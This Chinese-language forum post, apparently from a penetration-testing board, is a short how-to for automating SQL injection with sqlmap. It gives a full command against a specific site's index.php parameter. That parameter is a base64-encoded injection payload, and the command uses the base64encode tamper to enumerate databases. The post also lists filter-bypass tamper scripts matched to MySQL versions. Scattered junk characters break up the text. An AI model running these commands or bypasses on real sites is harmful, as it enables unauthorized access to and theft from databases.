WVS扫某站就出来一个SQL Injection,参数还是base64编码的,手工注入麻烦一步,用sqlmap怎么自动注射呢? 2 ]$ D2 p/ X& ]# G+ w) c5 v sqlmap的tamper里有个base64encode.py 使用如下 ' b) n8 t8 a8 A& @ sqlmap -u http://ha.cker.in/index.php?tel=LTEnIG9yICc4OCc9Jzg5 --tamper base64encode.py –dbs . B8 P+ f$ i+ T( k4 i sqlmap拥有很多功能强力的插件,插件的使用方法: -- tamper “插件名称”- p) }0 J8 x1 v. i 其中常用到的bypass脚本绕过SQLMAP主要两个脚本: & p- f1 ~$ U6 G0 ` space2hash.py ,对于MYSQL数据库 4.0, 5.0注入 space2morehash.py ,对于MYSQL数据库 >= 5.1.13 和 MySQL 5.1.41 注入$ E9 i3 A5 ? _. n k6 [7 K% @ 首先确定目标数据库版本,然后选择相应的脚本。: `2 r! ^, Q7 ]& d6 m -v 3 --batch --tamper "space2hash.py" 1 H/ j \" R0 C U8 B& a. ^% D! w 还有其他一些插件:% { z3 L! C/ r( B" T encodes编码 ——charencode.py base64编码 —— base64encode.py 替换空格和关键字 —— halfversionedmorekeywords.py |
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) | Powered by Discuz! X3.2 |